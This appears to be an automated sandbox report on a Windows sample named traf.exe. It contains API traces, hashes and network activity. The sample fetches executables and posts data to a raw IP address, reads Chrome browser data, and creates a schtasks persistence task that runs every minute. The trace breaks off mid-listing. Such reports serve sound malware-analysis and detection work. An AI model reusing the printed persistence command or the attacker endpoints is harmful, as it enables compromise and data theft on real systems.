popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

traf.exe

Antivirus UPX ScreenShot KeyLogger GIF Format AntiDebug Lnk Format OS Processor Check PE32 PE File .NET EXE AntiVM
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6403_us Jan. 27, 2025, 4:46 p.m. Jan. 27, 2025, 4:51 p.m.
Size 13.5KB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 77947379b9e26603db5a24e63d9e68fc
SHA256 4d2bed7b84733fd0b18cdc6c01aa7518d62981d4d0e633c00caa648d0e188937
CRC32 826883E6
ssdeep 192:vBAlEMZWAY5nCtCY61l40CMvPSohzWLz5xWfgOQ/muu/d5THm4Ot0O:JAnLAXNy/m3/bTK0O
Yara
  • PE_Header_Zero - PE File Signature
  • IsPE32 - (no description)

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: SUCCESS: The scheduled task "8E9A.tmp" has successfully been created.
console_handle: 0x0000000000000007
1 1 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
Time & API Arguments Status Return Repeated

__exception__

 stacktrace: 
Work-0xa8412 @ 0x253043a
Work-0xa79c4 @ 0x2530e88
Work-0xa71f6 @ 0x2531656
Work-0xa3fea @ 0x2534862
Work-0xa3ce3 @ 0x2534b69
Work-0xa0e4b @ 0x2537a01
Work-0xaf6c9 @ 0x2529183
Work-0xaf90a @ 0x2528f42
Work-0xd635 @ 0x25cb217
Work-0x59f @ 0x25d82ad
Work+0x52 @ 0x25d889e
Work-0xf2 @ 0x282d0a
Work-0x60 @ 0x282d9c
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0xeedfade
exception.offset: 46887
exception.address: 0x7559b727
registers.esp: 36959712
registers.edi: 0
registers.eax: 36959712
registers.ebp: 36959792
registers.edx: 0
registers.ebx: 40907784
registers.esi: 41000824
registers.ecx: 7
1 0 0
suspicious_features POST method with no referer header, Connection to IP address suspicious_request POST http://18.230.108.113/smk/
suspicious_features Connection to IP address suspicious_request GET http://18.230.108.113/vapo.exe
suspicious_features Connection to IP address suspicious_request GET http://18.230.108.113/files/sel1.exe
suspicious_features POST method with no referer header, HTTP version 1.0 used, Connection to IP address suspicious_request POST http://18.230.108.113/bot/
suspicious_features GET method with no useragent header suspicious_request GET https://pastebin.com/raw/djZsmRNC
request GET http://www.bing.com/
request GET http://go.microsoft.com/fwlink/?LinkId=249109
request GET http://go.microsoft.com/fwlink/?LinkId=133405
request POST http://18.230.108.113/smk/
request GET http://18.230.108.113/vapo.exe
request GET http://18.230.108.113/files/sel1.exe
request GET http://windowsupdate.microsoft.com/
request POST http://18.230.108.113/bot/
request GET https://pastebin.com/raw/djZsmRNC
request POST http://18.230.108.113/smk/
request POST http://18.230.108.113/bot/
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 1280
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00240000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1280
region_size: 40960
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00250000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1280
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00260000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1280
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00290000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1280
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00290000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1280
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00290000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1280
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x002a0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1280
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x002a0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1280
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x002a0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1280
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x002a0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1280
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003f0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1280
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00520000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1280
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00520000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1280
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00520000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1280
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00520000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1280
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00520000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1280
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00520000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1280
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00520000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1280
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00520000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1280
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00530000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1280
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00540000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1280
region_size: 2625536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x023a0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2396
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00360000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2396
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00360000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2396
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00360000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2396
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00360000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2396
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00370000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2396
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00370000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2396
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00370000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2396
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00370000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2396
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00620000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2396
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00620000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2396
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00620000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2396
region_size: 135168
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02100000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2396
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01ee0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2396
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01ee0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2396
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01ee0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2396
region_size: 266240
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x022f0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2396
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01ee0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2396
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01ee0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2396
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01ee0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2396
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01ee0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2396
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01ee0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2396
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01ee0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2396
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01ee0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2396
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01ee0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2396
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01ee0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2396
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01ee0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2396
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01ee0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2396
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01ee0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0
description explorer.exe tried to sleep 387 seconds, actually delayed analysis time by 387 seconds
Time & API Arguments Status Return Repeated

GetDiskFreeSpaceExW

 total_number_of_free_bytes: 9933877248
free_bytes_available: 9933877248
root_path: C:\
total_number_of_bytes: 34252779520
1 1 0
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal
registry HKEY_CURRENT_USER\Software\Opera Software
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8E9A.tmp.lnk
file C:\Users\test22\AppData\Local\Temp\8E9A.tmp.exe
file C:\Users\test22\AppData\Roaming\8E9A.tmp.exe
file C:\Users\test22\AppData\Local\Temp\9263.tmp.exe
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8E9A.tmp.lnk
cmdline schtasks.exe /create /f /RL HIGHEST /sc minute /mo 1 /tn "8E9A.tmp" /tr "C:\Users\test22\AppData\Roaming\8E9A.tmp.exe"
cmdline "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "8E9A.tmp" /tr "C:\Users\test22\AppData\Roaming\8E9A.tmp.exe"
cmdline svchost.exe
file C:\Users\test22\AppData\Local\Temp\8E9A.tmp.exe
file C:\Users\test22\AppData\Local\Temp\9263.tmp.exe
file C:\Users\test22\AppData\Local\Temp\traf.exe
Time & API Arguments Status Return Repeated

ShellExecuteExW

 show_type: 0
filepath_r: schtasks.exe
parameters: /create /f /RL HIGHEST /sc minute /mo 1 /tn "8E9A.tmp" /tr "C:\Users\test22\AppData\Roaming\8E9A.tmp.exe"
filepath: schtasks.exe
1 1 0
Time & API Arguments Status Return Repeated

Process32NextW

 snapshot_handle: 0x00000104
process_name: wsqmcons.exe
process_identifier: 1872
1 1 0

Process32NextW

 snapshot_handle: 0x00000104
process_name: cmd.exe
process_identifier: 1972
1 1 0

Process32NextW

 snapshot_handle: 0x00000104
process_name: conhost.exe
process_identifier: 1256
1 1 0

Process32NextW

 snapshot_handle: 0x00000104
process_name: SearchFilterHost.exe
process_identifier: 300
1 1 0

Process32NextW

 snapshot_handle: 0x00000104
process_name: traf.exe
process_identifier: 1280
1 1 0

Process32NextW

 snapshot_handle: 0x000000b0
process_name: schtasks.exe
process_identifier: 1960
1 1 0

Process32NextW

 snapshot_handle: 0x000000b0
process_name: conhost.exe
process_identifier: 2052
1 1 0

Process32NextW

 snapshot_handle: 0x0000010c
process_name: svchost.exe
process_identifier: 2228
1 1 0

Process32NextW

 snapshot_handle: 0x0000010c
process_name: mscorsvw.exe
process_identifier: 2256
1 1 0

Process32NextW

 snapshot_handle: 0x0000010c
process_name: mscorsvw.exe
process_identifier: 2296
1 1 0

Process32NextW

 snapshot_handle: 0x00000120
process_name: explorer.exe
process_identifier: 2396
1 1 0

Process32NextW

 snapshot_handle: 0x0000011c
process_name: is32bit.exe
process_identifier: 2432
1 1 0

Process32NextW

 snapshot_handle: 0x0000011c
process_name: cmd.exe
process_identifier: 2532
1 1 0

Process32NextW

 snapshot_handle: 0x0000011c
process_name: pw.exe
process_identifier: 2564
1 1 0

Process32NextW

 snapshot_handle: 0x000002a4
process_name: cmd.exe
process_identifier: 2620
1 1 0

Process32NextW

 snapshot_handle: 0x000002a4
process_name: conhost.exe
process_identifier: 2628
1 1 0

Process32NextW

 snapshot_handle: 0x000002a4
process_name: pw.exe
process_identifier: 2652
1 1 0

Process32NextW

 snapshot_handle: 0x000002c4
process_name: 8E9A.tmp.exe
process_identifier: 2668
1 1 0

Process32NextW

 snapshot_handle: 0x000002cc
process_name: inject-x86.exe
process_identifier: 2748
1 1 0

Process32NextW

 snapshot_handle: 0x000002b0
process_name: svchost.exe
process_identifier: 2772
1 1 0

Process32NextW

 snapshot_handle: 0x000002b0
process_name: schtasks.exe
process_identifier: 2860
1 1 0

Process32NextW

 snapshot_handle: 0x000002b0
process_name: conhost.exe
process_identifier: 2896
1 1 0

Process32NextW

 snapshot_handle: 0x000002b0
process_name: cmd.exe
process_identifier: 2940
1 1 0

Process32NextW

 snapshot_handle: 0x000002b0
process_name: conhost.exe
process_identifier: 2948
1 1 0

Process32NextW

 snapshot_handle: 0x000002b0
process_name: pw.exe
process_identifier: 2972
1 1 0

Process32NextW

 snapshot_handle: 0x000001e8
process_name: svchost.exe
process_identifier: 2996
1 1 0

Process32NextW

 snapshot_handle: 0x000001e8
process_name: WerFault.exe
process_identifier: 3024
1 1 0

Process32NextW

 snapshot_handle: 0x000001e8
process_name: inject-x64.exe
process_identifier: 3048
1 1 0

Process32NextW

 snapshot_handle: 0x00000224
process_name: cmd.exe
process_identifier: 800
1 1 0

Process32NextW

 snapshot_handle: 0x00000224
process_name: pw.exe
process_identifier: 2096
1 1 0

Process32NextW

 snapshot_handle: 0x000001dc
process_name: cmd.exe
process_identifier: 2192
1 1 0

Process32NextW

 snapshot_handle: 0x000001dc
process_name: conhost.exe
process_identifier: 2340
1 1 0

Process32NextW

 snapshot_handle: 0x000001dc
process_name: pw.exe
process_identifier: 2424
1 1 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

 flags: 15
family: 0
111 0
section {u'size_of_data': u'0x00002e00', u'virtual_address': u'0x00001000', u'entropy': 7.8833038849380515, u'name': u'.text', u'virtual_size': u'0x00002cc8'} entropy 7.88330388494 description A section with a high entropy has been found
entropy 0.884615384615 description Overall entropy of this PE file is high
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
Time & API Arguments Status Return Repeated

Process32NextW

 snapshot_handle: 0x000000b0
process_name: conhost.exe
process_identifier: 2052
0 0

Process32NextW

 snapshot_handle: 0x000000b0
process_name: conhost.exe
process_identifier: 2052
0 0

Process32NextW

 snapshot_handle: 0x000000b0
process_name: pw.exe
process_identifier: 2004
0 0

Process32NextW

 snapshot_handle: 0x000000b0
process_name: pw.exe
process_identifier: 2004
0 0

Process32NextW

 snapshot_handle: 0x000000b0
process_name: pw.exe
process_identifier: 2004
0 0

Process32NextW

 snapshot_handle: 0x000000b0
process_name: pw.exe
process_identifier: 2004
0 0

Process32NextW

 snapshot_handle: 0x000000b0
process_name: pw.exe
process_identifier: 2004
0 0

Process32NextW

 snapshot_handle: 0x000000b0
process_name: pw.exe
process_identifier: 2004
0 0

Process32NextW

 snapshot_handle: 0x000000b0
process_name: pw.exe
process_identifier: 2004
0 0

Process32NextW

 snapshot_handle: 0x000000b0
process_name: pw.exe
process_identifier: 2004
0 0

Process32NextW

 snapshot_handle: 0x000000b0
process_name: pw.exe
process_identifier: 2004
0 0

Process32NextW

 snapshot_handle: 0x000000b0
process_name: pw.exe
process_identifier: 2004
0 0

Process32NextW

 snapshot_handle: 0x000000b0
process_name: pw.exe
process_identifier: 2004
0 0

Process32NextW

 snapshot_handle: 0x000000b0
process_name: pw.exe
process_identifier: 2004
0 0

Process32NextW

 snapshot_handle: 0x000000b0
process_name: pw.exe
process_identifier: 2004
0 0

Process32NextW

 snapshot_handle: 0x000000b0
process_name: pw.exe
process_identifier: 2004
0 0

Process32NextW

 snapshot_handle: 0x000000b0
process_name: pw.exe
process_identifier: 2004
0 0

Process32NextW

 snapshot_handle: 0x000000b0
process_name: pw.exe
process_identifier: 2004
0 0

Process32NextW

 snapshot_handle: 0x000000b0
process_name: pw.exe
process_identifier: 2004
0 0

Process32NextW

 snapshot_handle: 0x000000b0
process_name: pw.exe
process_identifier: 2004
0 0

Process32NextW

 snapshot_handle: 0x000000b0
process_name: pw.exe
process_identifier: 2004
0 0

Process32NextW

 snapshot_handle: 0x000000b0
process_name: pw.exe
process_identifier: 2004
0 0

Process32NextW

 snapshot_handle: 0x000000b0
process_name: pw.exe
process_identifier: 2004
0 0

Process32NextW

 snapshot_handle: 0x000000b0
process_name: pw.exe
process_identifier: 2004
0 0

Process32NextW

 snapshot_handle: 0x000000b0
process_name: pw.exe
process_identifier: 2004
0 0

Process32NextW

 snapshot_handle: 0x000000b0
process_name: pw.exe
process_identifier: 2004
0 0

Process32NextW

 snapshot_handle: 0x000000b0
process_name: pw.exe
process_identifier: 2004
0 0

Process32NextW

 snapshot_handle: 0x000000b0
process_name: pw.exe
process_identifier: 2004
0 0

Process32NextW

 snapshot_handle: 0x000000b0
process_name: pw.exe
process_identifier: 2004
0 0

Process32NextW

 snapshot_handle: 0x000000b0
process_name: pw.exe
process_identifier: 2004
0 0

Process32NextW

 snapshot_handle: 0x000000b0
process_name: pw.exe
process_identifier: 2004
0 0

Process32NextW

 snapshot_handle: 0x000000b0
process_name: pw.exe
process_identifier: 2004
0 0

Process32NextW

 snapshot_handle: 0x000000b0
process_name: pw.exe
process_identifier: 2004
0 0

Process32NextW

 snapshot_handle: 0x000000b0
process_name: pw.exe
process_identifier: 2004
0 0

Process32NextW

 snapshot_handle: 0x000000b0
process_name: pw.exe
process_identifier: 2004
0 0

Process32NextW

 snapshot_handle: 0x000000b0
process_name: pw.exe
process_identifier: 2004
0 0

Process32NextW

 snapshot_handle: 0x000000b0
process_name: pw.exe
process_identifier: 2004
0 0

Process32NextW

 snapshot_handle: 0x000000b0
process_name: pw.exe
process_identifier: 2004
0 0

Process32NextW

 snapshot_handle: 0x000000b0
process_name: pw.exe
process_identifier: 2004
0 0

Process32NextW

 snapshot_handle: 0x000000b0
process_name: pw.exe
process_identifier: 2004
0 0

Process32NextW

 snapshot_handle: 0x000000b0
process_name: pw.exe
process_identifier: 2004
0 0

Process32NextW

 snapshot_handle: 0x000000b0
process_name: pw.exe
process_identifier: 2004
0 0

Process32NextW

 snapshot_handle: 0x000000b0
process_name: pw.exe
process_identifier: 2004
0 0

Process32NextW

 snapshot_handle: 0x000000b0
process_name: pw.exe
process_identifier: 2004
0 0

Process32NextW

 snapshot_handle: 0x000000b0
process_name: pw.exe
process_identifier: 2004
0 0

Process32NextW

